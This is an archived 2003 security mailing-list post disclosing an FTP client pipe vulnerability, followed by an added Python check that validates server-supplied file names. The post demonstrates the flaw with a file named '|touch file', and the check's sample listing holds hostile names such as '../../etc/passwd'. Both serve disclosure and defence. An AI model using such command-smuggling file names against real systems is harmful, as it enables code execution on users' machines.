Message-ID: <Pine.GSO.4.53.0302251219580.7656@europa.oicinc.com>
From: schoe at oicinc.com (SChoe)
Subject: RE: Multiple Vendor FTP pipe Vulnerability
Oops. The "touch" syntax is wrong due to my lack of cut-n-paste skills.
touch \|touch\ file <--------Wrong
touch \|touch\ file.txt <--------Right
My bad...
On Tue, 25 Feb 2003, SChoe wrote:
> Date: Tue, 25 Feb 2003 12:17:50 -1000 (HST)
> From: SChoe <schoe@...inc.com>
> To: bugtraq@...urityfocus.com
> Cc: full-disclosure@...ts.netsys.com
> Subject: RE: Multiple Vendor FTP pipe Vulnerability
>
> Securityfocus has a post on its website regarding this vulnerability in
> many ftp clients. I've tested and subsequently validated this issue on
> many of the platforms mentioned in their advisory. They mention
> the Netscape client on Windows 2000 Professional, but fail to
> mention that the commandline ftp client included with win2k (server and
> pro) is also vulnerable.
>
> <-----------------------snip----------------------->
> # Create file on ftp server for download by client.
> schoe@ftp:/home/ftp$ touch \|touch\ file
>
> # Start commandline ftp client on win2k.
> Microsoft Windows 2000 [Version 5.00.2195]
> <C> Copyright 1985-2000 Microsoft Corp.
>
> C:\ ftp ftp.xxxx.com
> ....
> ftp> get "|touch file.txt"
> ...
> ftp> quit
> 221 Goodbye.
>
> # "C:\file.txt" should now exist.
> <-----------------------snap----------------------->
>
> Multiple Vendor FTP pipe Vulnerability
> ======================================
> www.securityfocus.com/bid/396/info
.-------------------------------------------.
| Sung J. Choe <schoe[at]oicinc.com>, TICSA |
| Systems Admin, Facility Security Officer |
.-------------------------------------------.---.
| Oceanic Imaging Consultants, Inc. |
| Phone #: (808) 539.3634 |
.-----------------------------------.
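
A client-side check for the condition the transcript above demonstrates, where a server-supplied name beginning with `|` is used as the local target of `get`. This is an added example, not part of the original post; the function names, the character deny-list and the sample listing are assumptions constructed for illustration.

```python
import os

class UnsafeRemoteName(ValueError):
    """A server-supplied file name that must not be used as a local target."""

# Characters a shell or a pipe-aware client could interpret (assumed deny-list).
_META = set('|<>&;`$"\'*?:')

def safe_local_path(remote_name, download_dir):
    """Return a path inside download_dir for remote_name, or raise."""
    name = remote_name.strip()
    if not name or name in (".", ".."):
        raise UnsafeRemoteName("empty or dot name")
    if "/" in name or "\\" in name:
        raise UnsafeRemoteName("directory component in name")
    if name[0] in "|-":
        # '|' is the case in the transcript; '-' could be read as an option.
        raise UnsafeRemoteName("leading '|' or '-'")
    if _META & set(name) or any(ord(c) < 32 for c in name):
        raise UnsafeRemoteName("shell metacharacter or control character")
    root = os.path.realpath(download_dir)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(target) != root:
        # Catches an existing symlink in download_dir that points elsewhere.
        raise UnsafeRemoteName("resolves outside download directory")
    return target

def filter_listing(names, download_dir):
    """Split a directory listing into safe local paths and rejected names."""
    accepted, rejected = [], {}
    for n in names:
        try:
            accepted.append(safe_local_path(n, download_dir))
        except UnsafeRemoteName as exc:
            rejected[n] = str(exc)
    return accepted, rejected

# Constructed listing, as a hostile or careless server might return it.
SAMPLE_LISTING = ["report 2003.txt", "|touch file.txt", "../../etc/passwd",
                  "  |touch file.txt", "file.txt", "-rf", ""]

if __name__ == "__main__":
    import tempfile
    ok, bad = filter_listing(SAMPLE_LISTING, tempfile.mkdtemp())
    for path in ok:
        print("accept", path)
    for name, why in bad.items():
        print("reject", repr(name), "->", why)
```

The point of the check is that the local file name is chosen or validated by the client and opened directly as a file, never handed to a shell or to the client's own pipe syntax.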